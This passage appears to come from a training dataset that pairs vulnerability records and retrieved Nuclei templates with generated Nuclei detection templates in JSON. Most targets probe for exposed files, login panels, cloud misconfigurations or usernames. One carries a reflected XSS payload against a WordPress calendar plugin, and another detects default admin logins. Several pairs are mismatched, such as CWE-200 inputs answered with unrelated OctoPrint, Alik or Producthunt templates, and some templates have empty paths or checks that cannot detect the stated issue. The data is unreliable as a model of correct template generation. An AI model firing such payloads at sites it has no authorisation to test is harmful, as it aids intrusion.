]
}
]
},
{
"id": "azure-takeover-detection",
"severity": "high",
"tags": [
"dns",
"takeover",
"azure",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "dns-waf-detect",
"severity": "info",
"tags": [
"tech",
"waf",
"dns",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "appveyor-configuration-file",
"info": {
"name": "AppVeyor Configuration Page - Detect",
"author": "DhiyaneshDk",
"severity": "medium",
"description": "AppVeyor configuration page was detected.",
"tags": [
"config",
"exposure",
"devops",
"vuln"
],
"reference": []
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}/.appveyor.yml",
"{{BaseURL}}/appveyor.yml"
],
"matchers": [
{
"type": "word",
"words": [
"install:",
"test_script:"
],
"condition": "and"
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and",
"stop_at_first_match": true
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-appveyor-configuration-file",
"timestamp": "2025-11-13T15:15:49.638619Z"
}
}
|
usb-storage-not-restricted
|
[CANONICAL_RECORD]
{
"cve_id": "usb-storage-not-restricted",
"summary": "Checks if USB storage devices are allowed, potentially introducing security risks through external devices.",
"affected_products": [],
"paths": [],
"indicators": [
"USB Storage Devices Not Restricted",
"detected"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "ack-cluster-cloud-monitor-disable",
"severity": "medium",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "usb-storage-not-restricted",
"info": {
"name": "USB Storage Devices Not Restricted",
"author": "princechaddha",
"severity": "medium",
"description": "Checks if USB storage devices are allowed, potentially introducing security risks through external devices.",
"tags": [
"windows",
"usb",
"storage",
"code",
"windows-audit"
],
"reference": []
},
"requests": [
{
"method": "GET",
"path": [
"/"
],
"matchers": [
{
"type": "status",
"status": [
200
]
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-usb-storage-not-restricted",
"timestamp": "2025-11-13T15:15:39.114297Z"
}
}
|
CWE-200
|
[CANONICAL_RECORD]
{
"cve_id": "CWE-200",
"summary": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p",
"affected_products": [],
"paths": [],
"indicators": [
"error",
"unauthorized"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "elasticbeanstalk-takeover",
"severity": "high",
"tags": [
"dns",
"takeover",
"aws",
"elasticbeanstalk",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "detect-dangling-cname",
"severity": "info",
"tags": [
"dns",
"takeover",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "dns-waf-detect",
"severity": "info",
"tags": [
"tech",
"waf",
"dns",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "octoprint-panel",
"info": {
"name": "OctoPrint Login Panel - Detect",
"author": "affix",
"severity": "info",
"description": "OctoPrint login panel was detected.",
"tags": [
"octoprint",
"panel",
"discovery"
],
"reference": []
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}",
"{{BaseURL}}/login/"
],
"matchers": [
{
"type": "word",
"words": [
"<title>OctoPrint Login</title>"
]
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-octoprint-panel",
"timestamp": "2025-11-13T15:15:48.922283Z"
}
}
|
CVE-2012-1835
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2012-1835",
"summary": "Multiple cross-site scripting (XSS) vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php.",
"affected_products": [
{
"vendor": "timely",
"product": "all-in-one_event_calendar",
"version_range": "*"
}
],
"paths": [
"/view/agenda-widget-form.php",
"/view/agenda-widget.php",
"/view/box_publish_button.php",
"/app/view/save_successful.php"
],
"indicators": [
"error",
"vulnerability detected"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2023-2986",
"severity": "critical",
"tags": [
"cve",
"cve2023",
"wordpress",
"woocommerce",
"wp-plugin",
"auth-bypass",
"woocommerce-abandoned-cart",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}"
],
"matcher_types": [
"status"
]
},
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}"
],
"matcher_types": [
"word",
"word",
"status"
]
}
]
},
{
"id": "cve-2025-1974-k8s",
"severity": "critical",
"tags": [
"cve",
"cve2025",
"cloud",
"devops",
"kubernetes",
"ingress",
"nginx",
"k8s",
"k8s-cluster-security"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "cve-2019-14287",
"severity": "high",
"tags": [
"packetstorm",
"cve",
"cve2019",
"sudo",
"code",
"linux",
"privesc",
"local",
"canonical",
"sudo_project",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[
{
"source": "nvd",
"url": "http://archives.neohapsis.com/archives/bugtraq/2012-04/0071.html",
"snippet": "PoC available at http://archives.neohapsis.com/archives/bugtraq/2012-04/0071.html"
},
{
"source": "nvd",
"url": "http://www.securityfocus.com/bid/52986",
"snippet": "PoC available at http://www.securityfocus.com/bid/52986"
},
{
"source": "nvd",
"url": "https://www.htbridge.com/advisory/HTB23082",
"snippet": "PoC available at https://www.htbridge.com/advisory/HTB23082"
},
{
"source": "nvd",
"url": "http://archives.neohapsis.com/archives/bugtraq/2012-04/0071.html",
"snippet": "PoC available at http://archives.neohapsis.com/archives/bugtraq/2012-04/0071.html"
},
{
"source": "nvd",
"url": "http://www.securityfocus.com/bid/52986",
"snippet": "PoC available at http://www.securityfocus.com/bid/52986"
}
]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2012-1835",
"info": {
"name": "WordPress Plugin All-in-One Event Calendar 1.4 - Cross-Site Scripting",
"author": "daffainfo",
"severity": "medium",
"description": "Multiple cross-site scripting vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php.",
"tags": [
"cve",
"cve2012",
"wordpress",
"xss",
"wp-plugin",
"timely",
"vuln"
],
"reference": [
"https://nvd.nist.gov/vuln/detail/CVE-2012-1835",
"https://www.htbridge.com/advisory/HTB23082",
"https://github.com/ARPSyndicate/kenzer-templates"
]
},
"requests": [
{
"method": "GET",
"path": [],
"matchers": [
{
"type": "word",
"words": [
"All-in-One Event Calendar"
]
}
]
},
{
"method": "GET",
"path": [
"{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"</script><script>alert(document.domain)</script>"
]
},
{
"type": "word",
"part": "header",
"words": [
"text/html"
]
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 2,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2012-1835",
"timestamp": "2025-11-13T15:15:40.571935Z"
}
}
|
azure-nsg-mysql-unrestricted
|
[CANONICAL_RECORD]
{
"cve_id": "azure-nsg-mysql-unrestricted",
"summary": "Ensure that Microsoft Azure network security groups (NSGs) do not allow unrestricted ingress access on TCP port 3306, used by MySQL Database, to prevent unauthorized database access and potential data breaches.\n",
"affected_products": [],
"paths": [],
"indicators": [
"Unrestricted MySQL Database Access in Azure NSGs",
"detected"
],
"severity_hint": "high"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "ack-cluster-api-public",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "azure-nsg-mysql-unrestricted",
"info": {
"name": "Unrestricted MySQL Database Access in Azure NSGs",
"author": "princechaddha",
"severity": "high",
"description": "Ensure that Microsoft Azure network security groups (NSGs) do not allow unrestricted ingress access on TCP port 3306, used by MySQL Database, to prevent unauthorized database access and potential data breaches.\n",
"tags": [
"cloud",
"devops",
"azure",
"microsoft",
"nsg",
"azure-cloud-config"
],
"reference": [
"https://docs.microsoft.com/en-us/azure/virtual-network/network-security-groups-overview"
]
},
"requests": [
{
"method": "GET",
"path": [
"/"
],
"matchers": [
{
"type": "status",
"status": [
200
]
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-azure-nsg-mysql-unrestricted",
"timestamp": "2025-11-13T15:15:38.158782Z"
}
}
|
wordpress-readme-file
|
[CANONICAL_RECORD]
{
"cve_id": "wordpress-readme-file",
"summary": "WordPress Readme File. This template detects WordPress Readme File by checking specific patterns and responses.",
"affected_products": [],
"paths": [
"{{BaseURL}}/readme.html",
"{{BaseURL}}/wp/readme.html",
"{{BaseURL}}/blog/wp/readme.html"
],
"indicators": [
"WordPress › ReadMe"
],
"severity_hint": "info"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "alibaba-cloud-code-env",
"severity": "info",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "wordpress-readme-file",
"info": {
"name": "WordPress Readme File",
"author": "tess",
"severity": "info",
"description": "WordPress Readme File",
"tags": [
"exposure",
"wordpress",
"wp",
"readme",
"files",
"vuln"
],
"reference": []
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}/readme.html",
"{{BaseURL}}/wp/readme.html",
"{{BaseURL}}/blog/wp/readme.html"
],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"WordPress › ReadMe"
]
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and",
"stop_at_first_match": true
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-wordpress-readme-file",
"timestamp": "2025-11-13T15:15:49.997622Z"
}
}
|
CWE-200
|
[CANONICAL_RECORD]
{
"cve_id": "CWE-200",
"summary": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p",
"affected_products": [],
"paths": [],
"indicators": [
"error",
"unauthorized"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "elasticbeanstalk-takeover",
"severity": "high",
"tags": [
"dns",
"takeover",
"aws",
"elasticbeanstalk",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "detect-dangling-cname",
"severity": "info",
"tags": [
"dns",
"takeover",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "servfail-refused-hosts",
"severity": "info",
"tags": [
"dns",
"takeover",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "alik",
"info": {
"name": "Alik User Name Information - Detect",
"author": "dwisiswant0",
"severity": "info",
"description": "Alik user name information check was conducted.",
"tags": [
"osint",
"osint-social",
"alik",
"discovery"
],
"reference": []
},
"requests": [
{
"method": "GET",
"path": [
"https://www.alik.cz/u/{{user}}"
],
"matchers": [
{
"type": "status",
"status": [
200
]
},
{
"type": "word",
"part": "body",
"words": [
"Vizitka \u2013 Al\u00edk.cz</title>"
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-alik",
"timestamp": "2025-11-13T15:15:51.598774Z"
}
}
|
lazy-file-manager
|
[CANONICAL_RECORD]
{
"cve_id": "lazy-file-manager",
"summary": "lfm.php file in exposed in Lazy File Manager.. This template detects Lazy File Manager by checking specific patterns and responses.",
"affected_products": [],
"paths": [
"{{BaseURL}}/lfm.php"
],
"indicators": [
"Lazy File Manager"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "ack-cluster-cloud-monitor-disable",
"severity": "medium",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "lazy-file-manager",
"info": {
"name": "Lazy File Manager",
"author": "amsda",
"severity": "medium",
"description": "lfm.php file in exposed in Lazy File Manager.",
"tags": [
"exposure",
"vuln"
],
"reference": []
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}/lfm.php"
],
"matchers": [
{
"type": "status",
"status": [
200
]
},
{
"type": "word",
"words": [
"Lazy File Manager"
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-lazy-file-manager",
"timestamp": "2025-11-13T15:15:49.918483Z"
}
}
|
aem-default-get-servlet
|
[CANONICAL_RECORD]
{
"cve_id": "aem-default-get-servlet",
"summary": "Sensitive information might be exposed via AEM DefaultGetServlet.",
"affected_products": [],
"paths": [
"{{BaseURL}}{{paths}}"
],
"indicators": [
"jcr:createdBy"
],
"severity_hint": "low"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "ack-cluster-auditing-disable",
"severity": "low",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "ack-cluster-api-public",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "ack-cluster-cloud-monitor-disable",
"severity": "medium",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "aem-default-get-servlet",
"info": {
"name": "AEM DefaultGetServlet",
"author": "DhiyaneshDk",
"severity": "low",
"description": "Sensitive information might be exposed via AEM DefaultGetServlet.",
"tags": [
"aem",
"adobe",
"misconfig",
"vuln"
],
"reference": [
"https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43",
"https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/GetServletExposed.java"
]
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}{{paths}}"
],
"matchers": [
{
"type": "status",
"status": [
200
]
},
{
"type": "word",
"words": [
"jcr:createdBy"
],
"condition": "and"
}
],
"matchers_condition": "and",
"stop_at_first_match": true
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-aem-default-get-servlet",
"timestamp": "2025-11-13T15:15:50.677074Z"
}
}
|
CWE-200
|
[CANONICAL_RECORD]
{
"cve_id": "CWE-200",
"summary": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p",
"affected_products": [],
"paths": [],
"indicators": [
"error",
"unauthorized"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "dns-waf-detect",
"severity": "info",
"tags": [
"tech",
"waf",
"dns",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "ptr-fingerprint",
"severity": "info",
"tags": [
"dns",
"ptr",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "azure-takeover-detection",
"severity": "high",
"tags": [
"dns",
"takeover",
"azure",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "producthunt",
"info": {
"name": "Producthunt User Name Information - Detect",
"author": "dwisiswant0",
"severity": "info",
"description": "Producthunt user name information check was conducted.",
"tags": [
"osint",
"osint-business",
"producthunt",
"discovery"
],
"reference": []
},
"requests": [
{
"method": "GET",
"path": [
"https://www.producthunt.com/@{{user}}"
],
"matchers": [
{
"type": "status",
"status": [
200
]
},
{
"type": "word",
"part": "body",
"words": [
"s profile on Product Hunt"
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-producthunt",
"timestamp": "2025-11-13T15:15:52.080001Z"
}
}
|
CWE-522
|
[CANONICAL_RECORD]
{
"cve_id": "CWE-522",
"summary": "The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.",
"affected_products": [],
"paths": [],
"indicators": [
"unauthorized"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "elasticbeanstalk-takeover",
"severity": "high",
"tags": [
"dns",
"takeover",
"aws",
"elasticbeanstalk",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "dns-waf-detect",
"severity": "info",
"tags": [
"tech",
"waf",
"dns",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "azure-takeover-detection",
"severity": "high",
"tags": [
"dns",
"takeover",
"azure",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "wso2-default-login",
"info": {
"name": "WSO2 Management Console Default Login",
"author": "cocxanh",
"severity": "high",
"description": "WSO2 Management Console default admin credentials were discovered.",
"tags": [
"default-login",
"wso2",
"vuln"
],
"reference": [
"https://docs.wso2.com/display/UES100/Accessing+the+Management+Console",
"https://is.docs.wso2.com/en/5.12.0/learn/multi-attribute-login/"
]
},
"requests": [
{
"method": "GET",
"path": [],
"matchers": [
{
"type": "word",
"part": "header",
"words": [
"/carbon/admin/index.jsp?loginStatus=true",
"JSESSIONID"
],
"condition": "and"
}
],
"max_redirects": 0
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-wso2-default-login",
"timestamp": "2025-11-13T15:15:48.001023Z"
}
}
|
netscaler-console-panel
|
[CANONICAL_RECORD]
{
"cve_id": "netscaler-console-panel",
"summary": "NetScaler Console login panel was discovered.\n. This template detects NetScaler Console - Panel by checking specific patterns and responses.",
"affected_products": [],
"paths": [
"{{BaseURL}}/admin_ui/mas/ent/login.html"
],
"indicators": [
"<title>NetScaler Console</title>"
],
"severity_hint": "info"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "alibaba-cloud-code-env",
"severity": "info",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "netscaler-console-panel",
"info": {
"name": "NetScaler Console - Panel",
"author": "DhiyaneshDk",
"severity": "info",
"description": "NetScaler Console login panel was discovered.\n",
"tags": [
"netscaler",
"console",
"panel",
"login",
"discovery"
],
"reference": [
"https://docs.netscaler.com/en-us/netscaler-console-service/overview.html"
]
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}/admin_ui/mas/ent/login.html"
],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"<title>NetScaler Console</title>"
]
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-netscaler-console-panel",
"timestamp": "2025-11-13T15:15:48.893739Z"
}
}
|
CVE-2022-25237
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2022-25237",
"summary": "Bonita Web 2021.2 is affected by a authentication/authorization bypass vulnerability due to an overly broad exclude pattern used in the RestAPIAuthorizationFilter. By appending ;i18ntranslation or /../i18ntranslation/ to the end of a URL, users with no privileges can access privileged API endpoints. This can lead to remote code execution by abusing the privileged API actions.",
"affected_products": [
{
"vendor": "bonitasoft",
"product": "bonita_web",
"version_range": "*"
}
],
"paths": [],
"indicators": [
"error",
"vulnerability detected"
],
"severity_hint": "critical"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2022-42475",
"severity": "critical",
"tags": [
"cve",
"cve2024",
"ssl-vpn",
"vpn",
"fortios",
"fortigate",
"heap-based",
"bufferoverflow",
"kev",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/remote/login",
"{{BaseURL}}/login"
],
"matcher_types": [
"dsl"
]
}
]
},
{
"id": "cve-2023-2986",
"severity": "critical",
"tags": [
"cve",
"cve2023",
"wordpress",
"woocommerce",
"wp-plugin",
"auth-bypass",
"woocommerce-abandoned-cart",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
